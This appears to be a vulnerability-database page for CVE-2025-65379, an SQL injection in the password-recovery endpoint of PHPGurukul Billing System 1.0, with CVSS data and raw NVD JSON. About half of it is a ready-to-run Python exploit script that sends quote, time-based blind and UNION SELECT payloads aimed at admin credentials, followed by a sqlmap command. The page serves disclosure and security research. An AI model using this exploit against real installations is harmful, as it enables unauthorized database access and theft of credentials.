Security Vulnerability Report
中文
CVE-2025-65379 CVSS 6.5 MEDIUM

CVE-2025-65379

Published: 2025-12-02 20:15:53
Last Modified: 2025-12-04 19:13:35
Source: [email protected]

Description

PHPGurukul Billing System 1.0 is vulnerable to SQL Injection in the /admin/password-recovery.php endpoint. Specifically, the username and mobileno parameters accepts unvalidated user input, which is then concatenated directly into a backend SQL query.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:phpgurukul:billing_system:1.0:*:*:*:*:*:*:* - VULNERABLE
PHPGurukul Billing System 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-65379 SQL Injection PoC # Target: PHPGurukul Billing System 1.0 # Endpoint: /admin/password-recovery.php def exploit_sqli(target_url, payload): """ Execute SQL injection attack on password recovery endpoint Args: target_url: Base URL of the vulnerable application payload: SQL injection payload Returns: Response from the server """ endpoint = f"{target_url}/admin/password-recovery.php" # Inject payload into mobileno parameter (username also vulnerable) data = { 'username': 'admin', 'mobileno': payload, 'submit': 'Recover' } try: response = requests.post(endpoint, data=data, timeout=10) return response except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return None def test_basic_injection(target_url): """Test basic SQL injection with single quote""" print("[*] Testing basic SQL injection...") payload = "'" response = exploit_sqli(target_url, payload) if response and ('error' in response.text.lower() or 'sql' in response.text.lower()): print("[+] Basic injection detected - server returns SQL error") return True return False def extract_data_blind(target_url): """ Extract database version using boolean-based blind injection This payload tests if the database version starts with specific characters """ print("[*] Attempting blind SQL injection to extract database version...") # Payload to extract MySQL version # Adjust sleep time based on database response base_payload = "1' AND (SELECT SUBSTRING(@@version,1,1))='5' AND SLEEP(3)---" response = exploit_sqli(target_url, base_payload) if response and response.elapsed.total_seconds() > 2: print("[+] Blind injection confirmed - database version starts with 5") return True return False def union_injection(target_url): """ Attempt UNION-based injection to extract user credentials Adjust column count based on actual table structure """ print("[*] Attempting UNION-based injection...") # Typical UNION injection to extract admin credentials # Column count may need adjustment (try 1-10) payload = "1' UNION SELECT 1,2,3,4,5,6,7,8,9,10---" response = exploit_sqli(target_url, payload) if response and 'UNION' not in response.text: print("[+] UNION injection may be blocked or column mismatch") else: print("[+] Potential UNION injection point detected") return response if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://target.com/billing-system") sys.exit(1) target = sys.argv[1].rstrip('/') print(f"[*] Target: {target}") print(f"[*] CVE-2025-65379 SQL Injection PoC") print("=" * 50) # Run vulnerability tests test_basic_injection(target) union_injection(target) extract_data_blind(target) print("\n[*] Scan complete. Use sqlmap for comprehensive testing:") print(f" sqlmap -u '{target}/admin/password-recovery.php' --data='username=admin&mobileno=*&submit=Recover'")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65379", "sourceIdentifier": "[email protected]", "published": "2025-12-02T20:15:53.117", "lastModified": "2025-12-04T19:13:34.923", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PHPGurukul Billing System 1.0 is vulnerable to SQL Injection in the /admin/password-recovery.php endpoint. Specifically, the username and mobileno parameters accepts unvalidated user input, which is then concatenated directly into a backend SQL query."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:phpgurukul:billing_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "BFD3FF09-4311-4BE3-B90D-52C2018E5136"}]}]}], "references": [{"url": "https://github.com/dewcode91/security-research/blob/main/CVE-2025-65379.md", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://phpgurukul.com/billing-system-using-php-and-mysql/", "source": "[email protected]", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.